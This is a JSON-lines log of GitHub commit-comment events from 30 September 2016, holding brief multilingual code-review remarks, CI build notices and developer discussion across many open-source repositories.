{"id":"4643883037","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242135,"position":34,"line":436,"path":"arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi","commit_id":"ee5b5b480834ed5c979da82b975d74fe0f41cd66","created_at":"2016-09-30T14:47:46Z","updated_at":"2016-09-30T14:47:46Z","body":"Same here"}},"created_at":"2016-09-30T14:47:46Z"}
{"id":"4643890524","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242160,"position":274,"line":597,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"208bed4002a60323304a8d8a5afc2ef9414c7593","created_at":"2016-09-30T14:49:00Z","updated_at":"2016-09-30T14:49:00Z","body":"you leak tmp in case of tci == NINED3DTSS_TCI_DISABLE"}},"created_at":"2016-09-30T14:49:00Z"}
{"id":"4643892485","type":"CommitCommentEvent","actor":{"login":"julienrf"},"repo":{"name":"scala-js/scala-js"},"payload":{"comment":{"id":19242164,"position":6,"line":19,"path":"tools/shared/src/main/scala/org/scalajs/core/tools/linker/backend/ModuleKind.scala","commit_id":"f365668ef5d549c0463dab54953d844402ee6f4b","created_at":"2016-09-30T14:49:18Z","updated_at":"2016-09-30T14:49:18Z","body":"They"}},"created_at":"2016-09-30T14:49:18Z"}
{"id":"4643892763","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19242165,"position":null,"line":null,"path":null,"commit_id":"bedccdba490074216dcd38bfa2469ed342d471b7","created_at":"2016-09-30T14:49:20Z","updated_at":"2016-09-30T14:49:20Z","body":"les tabulations partout me piquent les yeux, tbh"}},"created_at":"2016-09-30T14:49:20Z"}
{"id":"4643900417","type":"CommitCommentEvent","actor":{"login":"lukeis"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19242188,"position":null,"line":null,"path":null,"commit_id":"e97639bce31c5ae040ab6681fc21f31e796a05e1","created_at":"2016-09-30T14:50:37Z","updated_at":"2016-09-30T14:50:37Z","body":"How do you generate this?"}},"created_at":"2016-09-30T14:50:37Z"}
{"id":"4643902722","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242196,"position":21,"line":21,"path":"Spica/PhotoData.swift","commit_id":"4b55d097f677e831860c582fbb351ab1fcec1507","created_at":"2016-09-30T14:50:59Z","updated_at":"2016-09-30T14:50:59Z","body":"\\() で埋め込んで1行にしたら如何でしょうか"}},"created_at":"2016-09-30T14:50:59Z"}
{"id":"4643903439","type":"CommitCommentEvent","actor":{"login":"jdcasey"},"repo":{"name":"yma88/indy"},"payload":{"comment":{"id":19242197,"position":null,"line":null,"path":null,"commit_id":"4ff5c7c22f245bb799793f8385609cdebb33a0c5","created_at":"2016-09-30T14:51:06Z","updated_at":"2016-09-30T14:51:06Z","body":"@yma88 You do make a decent point here, though...it might be nice to validate all remote repository URLs before they're stored. I'm just not sure this is how we want to go about it. We could create a StoreDataManager decorator that would intercept the storeXXX(..) methods and check validity there, I suppose...but we would definitely want to use a component and not a model object to implement the validity check.\r\n\r\nI don't want to lecture too much, but we're trying to make model classes that only store data, and components that implement actions on that data. So, models shouldn't contain logic, and components shouldn't store state, and API modules should contain only interfaces, exceptions, or sometimes trivially simple implementations.\r\n\r\nThere are exceptions to the rule, of course, but that's the guideline we're trying to follow."}},"created_at":"2016-09-30T14:51:06Z"}
{"id":"4643904352","type":"CommitCommentEvent","actor":{"login":"hosunglabs"},"repo":{"name":"hosunglabs/GreenLight"},"payload":{"comment":{"id":19242200,"position":null,"line":null,"path":null,"commit_id":"ab655a180e8659824fe1b3c7850a62f926ca23d5","created_at":"2016-09-30T14:51:15Z","updated_at":"2016-09-30T14:51:15Z","body":"Arduino"}},"created_at":"2016-09-30T14:51:15Z"}
{"id":"4643904986","type":"CommitCommentEvent","actor":{"login":"keolo"},"repo":{"name":"Soundflyinc/mixpanel_client"},"payload":{"comment":{"id":19242201,"position":11,"line":164,"path":"lib/mixpanel/client.rb","commit_id":"812d0c43f2ba045b357d27626ee81adf4975a808","created_at":"2016-09-30T14:51:21Z","updated_at":"2016-09-30T14:51:21Z","body":"No rush. Whenever/if you get to it, I'll be here to help."}},"created_at":"2016-09-30T14:51:21Z"}
{"id":"4643909866","type":"CommitCommentEvent","actor":{"login":"tkeffer"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19242212,"position":null,"line":null,"path":null,"commit_id":"d126625b8e4a5da9691d822e43e18734635893f9","created_at":"2016-09-30T14:52:09Z","updated_at":"2016-09-30T14:52:09Z","body":"I inserted the `2em` top margin for a reason: it was too hard to see where the `<h2>` sections started.\r\n\r\nDo you have a better way of doing this?\r\n\r\n"}},"created_at":"2016-09-30T14:52:09Z"}
{"id":"4643910149","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19242213,"position":12,"line":131,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/KtPostfixTemplateProvider.kt","commit_id":"85ab0642fdd5bf20637e038c9bf4509775d35cad","created_at":"2016-09-30T14:52:11Z","updated_at":"2016-09-30T14:52:11Z","body":"Maybe it would be better to leave this line and make `context` variable non-lazy? "}},"created_at":"2016-09-30T14:52:11Z"}
{"id":"4643911390","type":"CommitCommentEvent","actor":{"login":"pmac"},"repo":{"name":"mozmar/status.mozmar.org"},"payload":{"comment":{"id":19242215,"position":null,"line":null,"path":null,"commit_id":"e82a591df02c63654db3d6d6f91dcba7a4288996","created_at":"2016-09-30T14:52:22Z","updated_at":"2016-09-30T14:52:22Z","body":"Oh. I think excluding them is good. Apologies for failing to realize that they'd automatically show up here."}},"created_at":"2016-09-30T14:52:22Z"}
{"id":"4643913671","type":"CommitCommentEvent","actor":{"login":"HTMLCourses"},"repo":{"name":"caricardo/caricardo.github.io"},"payload":{"comment":{"id":19242220,"position":7,"line":6,"path":"index.html","commit_id":"695c268e7dcfe3e23497fed189e4eb234ec01650","created_at":"2016-09-30T14:52:46Z","updated_at":"2016-09-30T14:52:46Z","body":"все круто, только делай отступы в 2 пробела не больше"}},"created_at":"2016-09-30T14:52:46Z"}
{"id":"4643915382","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242228,"position":9,"line":9,"path":"Spica/PhotoData.swift","commit_id":"4b55d097f677e831860c582fbb351ab1fcec1507","created_at":"2016-09-30T14:53:03Z","updated_at":"2016-09-30T14:53:03Z","body":"~Dataというクラス名はDataという語によって明瞭さが増していないのでアンチパターンです。\r\nhttp://qiita.com/magicant/items/8134edf969f9629fa66e"}},"created_at":"2016-09-30T14:53:03Z"}
{"id":"4643917829","type":"CommitCommentEvent","actor":{"login":"NoHaxJustTryHqrd"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19242236,"position":null,"line":null,"path":null,"commit_id":"06405dc11533100b036b6e6b160429dbfa88d5eb","created_at":"2016-09-30T14:53:26Z","updated_at":"2016-09-30T14:53:26Z","body":"I found this by comparing the Genisys Furnace tile to the Phoenix one. Im sure you can find tons more bugs by comparing them"}},"created_at":"2016-09-30T14:53:26Z"}
{"id":"4643918193","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242237,"position":28,"line":28,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:53:29Z","updated_at":"2016-09-30T14:53:29Z","body":"Yes, it costs nothing and it will make Carlo participate I think !"}},"created_at":"2016-09-30T14:53:29Z"}
{"id":"4643919419","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242247,"position":null,"line":null,"path":null,"commit_id":"2444930c625e6214cce121468a77d92c7a4bd8e8","created_at":"2016-09-30T14:53:41Z","updated_at":"2016-09-30T14:53:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1227](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14724&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:08"}},"created_at":"2016-09-30T14:53:41Z"}
{"id":"4643919686","type":"CommitCommentEvent","actor":{"login":"HTMLCourses"},"repo":{"name":"caricardo/caricardo.github.io"},"payload":{"comment":{"id":19242252,"position":null,"line":null,"path":null,"commit_id":"d3c553077d32028cf7d70bcf16d3e21560cca0ed","created_at":"2016-09-30T14:53:44Z","updated_at":"2016-09-30T14:53:44Z","body":"отступы, отступы еще раз отступы"}},"created_at":"2016-09-30T14:53:44Z"}
{"id":"4643922626","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19242262,"position":null,"line":null,"path":null,"commit_id":"201b5112e04fd4fe17e34e79ceadedf5a18a8357","created_at":"2016-09-30T14:54:15Z","updated_at":"2016-09-30T14:54:15Z","body":"@brandyscarney see https://github.com/driftyco/ionic/issues/8307 and https://github.com/driftyco/ionic/issues/8307\r\n\r\nThanks"}},"created_at":"2016-09-30T14:54:15Z"}
{"id":"4643926024","type":"CommitCommentEvent","actor":{"login":"zes15"},"repo":{"name":"PinGTeam/PinG"},"payload":{"comment":{"id":19242273,"position":null,"line":null,"path":null,"commit_id":"e5004b5cc65a586382f02baf2c5e6c17a94aa345","created_at":"2016-09-30T14:54:47Z","updated_at":"2016-09-30T14:54:47Z","body":"![ping1](https://cloud.githubusercontent.com/assets/22353682/18995891/4bf6f390-86fc-11e6-9db2-8de7bd5ce560.png)\r\n"}},"created_at":"2016-09-30T14:54:47Z"}
{"id":"4643926663","type":"CommitCommentEvent","actor":{"login":"chrisjsherm"},"repo":{"name":"ghostbar/angular-zxcvbn"},"payload":{"comment":{"id":19242275,"position":null,"line":null,"path":null,"commit_id":"c8c9edd1d5308a03145aae07f49dcd26bd32b60e","created_at":"2016-09-30T14:54:53Z","updated_at":"2016-09-30T14:54:53Z","body":"Any reason not to add a tilde to the angular dependency? \r\n\r\nAll of my other 1.5 bower packages let the patch version float, so I'm getting a conflict due to this package requiring exactly 1.5.0."}},"created_at":"2016-09-30T14:54:53Z"}
{"id":"4643929350","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"shadowsocks/shadowsocks-android"},"payload":{"comment":{"id":19242283,"position":null,"line":null,"path":null,"commit_id":"5d7e88310bd21dedae78930ac846aee98543ffa5","created_at":"2016-09-30T14:55:19Z","updated_at":"2016-09-30T14:55:19Z","body":"@Mygod @madeye 请问这些依赖已更新，您马上就知道了，是 IDE 的提示吗？\r\n或者能否简述下，如何进行 Scala android app 的开发？我真想知道它用的是什么 IDE 或者编辑器。"}},"created_at":"2016-09-30T14:55:19Z"}
{"id":"4643930532","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242285,"position":107,"line":107,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:55:30Z","updated_at":"2016-09-30T14:55:30Z","body":"Yes, it's cleaner, But it will need to be updated for each soc, like pinctrl and clocks anyway"}},"created_at":"2016-09-30T14:55:30Z"}
{"id":"4643933492","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242294,"position":null,"line":null,"path":null,"commit_id":"6716e32f882ac912d4de61fcb9ba6981423a6d4c","created_at":"2016-09-30T14:55:58Z","updated_at":"2016-09-30T14:55:58Z","body":"Signed-off-by: Patrick Rudolph <siro@das-labor.org>"}},"created_at":"2016-09-30T14:55:58Z"}
{"id":"4643934948","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242300,"position":null,"line":null,"path":null,"commit_id":"64bd08ab62c9d9bfac00001a27bb425719edf0d3","created_at":"2016-09-30T14:56:13Z","updated_at":"2016-09-30T14:56:13Z","body":"@alexkulya no problem, that´s the point of being a team :D"}},"created_at":"2016-09-30T14:56:13Z"}
{"id":"4643937594","type":"CommitCommentEvent","actor":{"login":"jeremygray"},"repo":{"name":"psychopy/psychopy"},"payload":{"comment":{"id":19242310,"position":null,"line":null,"path":null,"commit_id":"dbfed25c4fa4c0cd8d08d0152fbee7f6a838090b","created_at":"2016-09-30T14:56:37Z","updated_at":"2016-09-30T14:56:37Z","body":"Thanks for fixing. I would have expected the first one (line 197) to be ok with just `writeIndented` since it only ever has a single '\\n' in the string named `code`."}},"created_at":"2016-09-30T14:56:37Z"}
{"id":"4643939105","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic-app-scripts"},"payload":{"comment":{"id":19242312,"position":null,"line":null,"path":null,"commit_id":"9ad370ade88a9ccb65832c0fabe2ef59351ad71e","created_at":"2016-09-30T14:56:54Z","updated_at":"2016-09-30T14:56:54Z","body":"@jgw96 Wait more fixs to increment version in package.json?\r\n\r\nThanks"}},"created_at":"2016-09-30T14:56:54Z"}
{"id":"4643940798","type":"CommitCommentEvent","actor":{"login":"rsterbin"},"repo":{"name":"rsterbin/liturgicalendar"},"payload":{"comment":{"id":19242316,"position":6,"line":11,"path":"database/migrations/20160810135105_stmarys_moveable_feasts.sql","commit_id":"234a963263af534ff5d31c3c2ebea7af782753c5","created_at":"2016-09-30T14:57:10Z","updated_at":"2016-09-30T14:57:10Z","body":"Saint Mary's is Episcopal, so the dates and color choices are a bit choose-your-own-adventure (and in this case, the rector chose gold). That's why all the migrations are either `schema` or `stmarys`.  Just about everything in this liturgical calendar needs to be flexible to accommodate house rules."}},"created_at":"2016-09-30T14:57:10Z"}
{"id":"4643940909","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242317,"position":120,"line":120,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:57:10Z","updated_at":"2016-09-30T14:57:10Z","body":"You should use readl/writel _relaxed versions since we do not need the memory barriers here, some reviewer will maybe complain about this"}},"created_at":"2016-09-30T14:57:10Z"}
{"id":"4643943858","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242328,"position":null,"line":null,"path":null,"commit_id":"f4989bce38fe30bbc5814d001d257b833b919e74","created_at":"2016-09-30T14:57:38Z","updated_at":"2016-09-30T14:57:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1228](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14732&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T14:57:38Z"}
{"id":"4643944463","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19242329,"position":null,"line":null,"path":null,"commit_id":"f901c8ed1baea72d8eb0fd62a23592d895500723","created_at":"2016-09-30T14:57:43Z","updated_at":"2016-09-30T14:57:43Z","body":" - Changed widget temperatures to be rounded with 0 d.p.\r\n - Changed daily forecast single temperatures to be Max instead of average\r\n - Gregorian and Jalali fix to convert time according to it's timezone\r\n - Units added for visibility distance\r\n - Fix on dailyForecast offset and iteration to have a max day value\r\n - Widget Design Sizes sanitised\r\n - Added Widgets body tranparency by default\r\n - Background colour removed from Add/Edit forms\r\n - Added new template ( 2nd Landscape )"}},"created_at":"2016-09-30T14:57:43Z"}
{"id":"4643946579","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19242338,"position":null,"line":null,"path":null,"commit_id":"06405dc11533100b036b6e6b160429dbfa88d5eb","created_at":"2016-09-30T14:58:04Z","updated_at":"2016-09-30T14:58:04Z","body":"@NoHaxJustTryHqrd This project is not for the purposes of copy-pasting Genisys into PocketMine. Genisys is a mess."}},"created_at":"2016-09-30T14:58:04Z"}
{"id":"4643948563","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"consolidation/Robo"},"payload":{"comment":{"id":19242344,"position":null,"line":null,"path":null,"commit_id":"551a819e7613bed45404641e52c90f0368e9b309","created_at":"2016-09-30T14:58:22Z","updated_at":"2016-09-30T14:58:22Z","body":"I haven't reviewed robo-paracept, but what gets added to Robo core is a @DavertMik question.\r\n\r\nIt might be helpful to have instructions on how folks can build their own phar with whatever extensions they wish in it.  I think it would probably work just fine to simply run `composer require` on the extensions you wanted from the Robo project directory; however, you would also want to add appropriate `use` statements to \\Robo\\LoadAllTasks.  I wonder if there would be an easy way to make a Robo plugin manager?  I don't see an easy way to do this without a code generator."}},"created_at":"2016-09-30T14:58:22Z"}
{"id":"4643951559","type":"CommitCommentEvent","actor":{"login":"carl-eis"},"repo":{"name":"nova-web-dev/mm-website"},"payload":{"comment":{"id":19242349,"position":259,"line":1111,"path":"index.html","commit_id":"646b8fd5e5a34280f755ee40205e157c4f50fcb0","created_at":"2016-09-30T14:58:52Z","updated_at":"2016-09-30T14:58:52Z","body":"Here, this is the problem. Because you are re-adding jquery again, it breaks everything that came before it. This line needs to be removed."}},"created_at":"2016-09-30T14:58:52Z"}
{"id":"4643953577","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242354,"position":null,"line":null,"path":null,"commit_id":"d889e5713d537856f2782c62db44059dc9727363","created_at":"2016-09-30T14:59:10Z","updated_at":"2016-09-30T14:59:10Z","body":"Perfecr work, friend."}},"created_at":"2016-09-30T14:59:10Z"}
{"id":"4643954114","type":"CommitCommentEvent","actor":{"login":"junjun1092"},"repo":{"name":"junjun1092/beego-blog"},"payload":{"comment":{"id":19242355,"position":null,"line":null,"path":null,"commit_id":"1b60c0b7ae65cc29093dd5d6525269f4989623c8","created_at":"2016-09-30T14:59:15Z","updated_at":"2016-09-30T14:59:15Z","body":"如果公司的事情多的话，就只能是完成公司的内容，如果内容不多，就抽出时间来学习beego；\r\n同时可以把在公司遇到的一些问题，尽量能应用于beego的学习；"}},"created_at":"2016-09-30T14:59:15Z"}
{"id":"4643956176","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242362,"position":null,"line":null,"path":null,"commit_id":"60891490cd494375ec9e1585a7c3775a8a7ab42a","created_at":"2016-09-30T14:59:36Z","updated_at":"2016-09-30T14:59:36Z","body":"@Bodeguero what´s the problem??"}},"created_at":"2016-09-30T14:59:36Z"}
{"id":"4643957416","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242364,"position":null,"line":null,"path":null,"commit_id":"c465ca4a5ed29b27520eda103a4f787f71dc4628","created_at":"2016-09-30T14:59:50Z","updated_at":"2016-09-30T14:59:50Z","body":"@Bodeguero Thanks for cleaning my mess"}},"created_at":"2016-09-30T14:59:50Z"}
{"id":"4643959311","type":"CommitCommentEvent","actor":{"login":"llbRambo"},"repo":{"name":"llbRambo/Test"},"payload":{"comment":{"id":19242366,"position":null,"line":null,"path":null,"commit_id":"3a1650ad90b271c9f615e141383f5c82edbbe2c1","created_at":"2016-09-30T15:00:10Z","updated_at":"2016-09-30T15:00:10Z","body":"你好，github，我是一只菜鸟"}},"created_at":"2016-09-30T15:00:10Z"}
{"id":"4643961219","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19242374,"position":null,"line":null,"path":null,"commit_id":"12fb3171436f0de111960a91154806b8cc6135ac","created_at":"2016-09-30T15:00:26Z","updated_at":"2016-09-30T15:00:26Z","body":"https://github.com/unified-db/Database/issues/251 ->\r\n\"Also when you complete the quest and he teaches you the spell, he should cast it onto you, like trainers normally do, currently he doesn't.\"\r\n(https://www.youtube.com/watch?v=aJWK6sSWWno&list=PL28173C4849CA7E04&index=1\r\n(Set to 0.25 speed) 9:29)\r\n\r\nusing your patch @boxa, he stops casting it on us,\r\nBut my patch is no good either if it breaks your examples so we need to find a whole other solution than any of ours as they don't cut it, at least not in their current forms."}},"created_at":"2016-09-30T15:00:26Z"}
{"id":"4643961685","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242375,"position":28,"line":28,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:00:31Z","updated_at":"2016-09-30T15:00:31Z","body":"OK"}},"created_at":"2016-09-30T15:00:31Z"}
{"id":"4643961991","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242377,"position":null,"line":null,"path":null,"commit_id":"d889e5713d537856f2782c62db44059dc9727363","created_at":"2016-09-30T15:00:35Z","updated_at":"2016-09-30T15:00:35Z","body":"@cooler-SAI Nice Job! I need for help to fix Travis CI - **constAuraEffectPtr _auraEff** not declared 👎 "}},"created_at":"2016-09-30T15:00:35Z"}
{"id":"4643962962","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242382,"position":160,"line":160,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:00:41Z","updated_at":"2016-09-30T15:00:41Z","body":"Add pr_fmt on top of the file to have the context on this error http://www.crashcourse.ca/wiki/index.php/Printk_and_variations#What.27s_pr_fmt_all_about.3F"}},"created_at":"2016-09-30T15:00:41Z"}
{"id":"4643964091","type":"CommitCommentEvent","actor":{"login":"Chadster766"},"repo":{"name":"jbsky/McDebian"},"payload":{"comment":{"id":19242386,"position":null,"line":null,"path":null,"commit_id":"cdb6478a1bf432a91bf23b7f8bb2c2731aa6aa22","created_at":"2016-09-30T15:00:51Z","updated_at":"2016-09-30T15:00:51Z","body":"Is the WPS testing complete? What were your results?"}},"created_at":"2016-09-30T15:00:51Z"}
{"id":"4643966650","type":"CommitCommentEvent","actor":{"login":"igneus"},"repo":{"name":"rsterbin/liturgicalendar"},"payload":{"comment":{"id":19242393,"position":6,"line":11,"path":"database/migrations/20160810135105_stmarys_moveable_feasts.sql","commit_id":"234a963263af534ff5d31c3c2ebea7af782753c5","created_at":"2016-09-30T15:01:16Z","updated_at":"2016-09-30T15:01:16Z","body":"I see. Thanks for the explanation and sorry for the noise."}},"created_at":"2016-09-30T15:01:16Z"}
{"id":"4643968339","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242398,"position":null,"line":null,"path":null,"commit_id":"60891490cd494375ec9e1585a7c3775a8a7ab42a","created_at":"2016-09-30T15:01:33Z","updated_at":"2016-09-30T15:01:33Z","body":"@Keital note declared 👎 "}},"created_at":"2016-09-30T15:01:33Z"}
{"id":"4643968636","type":"CommitCommentEvent","actor":{"login":"unbit"},"repo":{"name":"unbit/uwsgi"},"payload":{"comment":{"id":19242399,"position":4,"line":3051,"path":"uwsgi.h","commit_id":"ff587dffde9ddaca5db720bce5d693f416d74628","created_at":"2016-09-30T15:01:35Z","updated_at":"2016-09-30T15:01:35Z","body":"please move it to the end of the structure to maintain ABI"}},"created_at":"2016-09-30T15:01:35Z"}
{"id":"4643968874","type":"CommitCommentEvent","actor":{"login":"Chadster766"},"repo":{"name":"jbsky/McDebian"},"payload":{"comment":{"id":19242400,"position":null,"line":null,"path":null,"commit_id":"cdb6478a1bf432a91bf23b7f8bb2c2731aa6aa22","created_at":"2016-09-30T15:01:37Z","updated_at":"2016-09-30T15:01:37Z","body":"It looks like in the case of a reset button press nothing happens at this point?"}},"created_at":"2016-09-30T15:01:37Z"}
{"id":"4643970132","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242405,"position":107,"line":107,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:01:50Z","updated_at":"2016-09-30T15:01:50Z","body":"Yeah, and actually I found out that this not really the number of gpios ... at least not on every chip :("}},"created_at":"2016-09-30T15:01:50Z"}
{"id":"4643971915","type":"CommitCommentEvent","actor":{"login":"zachsully"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19242413,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-30T15:02:09Z","updated_at":"2016-09-30T15:02:09Z","body":"I've had that thought before, but there are somethings related to software publishing and citation that has held me back from putting it on hackage: \r\n1. It is a fork of language-c because the main structure of the AST and pretty printer came from their and I made many changes. I do not know how I should explain this or if I have to do something because of its BSD3 license. Both packages really on the c99 standard as their main guide for constructing the AST.\r\n2. I created the files in the hakaru project under its license (BSD3), I'm not sure if I need to say something about this or keep the same license in a separate package. "}},"created_at":"2016-09-30T15:02:09Z"}
{"id":"4643972419","type":"CommitCommentEvent","actor":{"login":"mhaddadi"},"repo":{"name":"stagemonitor/stagemonitor-grafana-elasticsearch"},"payload":{"comment":{"id":19242415,"position":null,"line":null,"path":null,"commit_id":"0609129cab5268203b00b68cafa192d6164a8f61","created_at":"2016-09-30T15:02:13Z","updated_at":"2016-09-30T15:02:13Z","body":"Hello Felix,\r\n\r\ntrying to install Stagemonitor plugin into Grafana, I encontered this error:\r\n`\r\nt=2016-09-30T16:32:56+0200 lvl=info msg=\"Request Completed\" logger=context userId=1 orgId=1 uname=admin method=GET path=/public/plugins/stagemonitor-grafana-elasticsearch/plugin.json status=404 remote_addr=127.0.0.1 time_ns=0 size=19\r\n`\r\n\r\nI wonder if the source src/components/config.js shouldn't be impacted by the update of id. \r\n\r\nI tried to change on line 19\r\n`backendSrv.get('/public/plugins/stagemonitor-grafana-elasticsearch/plugin.json').then(data => {`\r\nby\r\n`backendSrv.get('/public/plugins/stagemonitor-elasticsearch-app/plugin.json').then(data => {`\r\nand it seemed to fix my problem.\r\n\r\nWhat is your opinion about it ?\r\n\r\nBest regards,\r\nManuel Haddadi"}},"created_at":"2016-09-30T15:02:13Z"}
{"id":"4643972932","type":"CommitCommentEvent","actor":{"login":"Manduro"},"repo":{"name":"driftyco/ionic-app-scripts"},"payload":{"comment":{"id":19242416,"position":22,"line":19,"path":"config/rollup.prod.config.js","commit_id":"b0a55b37474e8b15c4e510a3dc7932f61e4927e0","created_at":"2016-09-30T15:02:17Z","updated_at":"2016-09-30T15:02:17Z","body":"@jgw96 It would be nice if sourceMap could be set to false as it's not needed for production (#40)"}},"created_at":"2016-09-30T15:02:17Z"}
{"id":"4643973417","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242419,"position":120,"line":120,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:02:22Z","updated_at":"2016-09-30T15:02:22Z","body":"indeed ... will be fixed"}},"created_at":"2016-09-30T15:02:22Z"}
{"id":"4643973891","type":"CommitCommentEvent","actor":{"login":"rgbkrk"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19242420,"position":null,"line":null,"path":null,"commit_id":"96933df2ffa959ab32644314f1573790ebf0a793","created_at":"2016-09-30T15:02:25Z","updated_at":"2016-09-30T15:02:25Z","body":"You're my hero for acknowledging this and making it easier to keep both node and Electron moving forward for users."}},"created_at":"2016-09-30T15:02:25Z"}
{"id":"4643976744","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242427,"position":20,"line":436,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"d69342c098eefb6c5bfe8a0cc6a069e7116011a8","created_at":"2016-09-30T15:02:55Z","updated_at":"2016-09-30T15:02:55Z","body":"else"}},"created_at":"2016-09-30T15:02:55Z"}
{"id":"4643979390","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19242434,"position":13,"line":47,"path":"src/mods/text.js","commit_id":"0e0492717658baf2eddf5be18f79f691bf70794d","created_at":"2016-09-30T15:03:22Z","updated_at":"2016-09-30T15:03:22Z","body":"- lowerCamelCase please\r\n- var can only be used in a function context, have a look at the method you replaced"}},"created_at":"2016-09-30T15:03:22Z"}
{"id":"4643979941","type":"CommitCommentEvent","actor":{"login":"pushrbx"},"repo":{"name":"pushrbx/python3-mal"},"payload":{"comment":{"id":19242436,"position":null,"line":null,"path":null,"commit_id":"a50b3b23ec7ea91e1c0e8f66e76a6a68b782f262","created_at":"2016-09-30T15:03:27Z","updated_at":"2016-09-30T15:03:27Z","body":"@rachmadaniHaryono why don't we create a new repo with merged code, and setup backward compatibility to py2.7 with six? :D \r\nBtw, yeah sure."}},"created_at":"2016-09-30T15:03:27Z"}
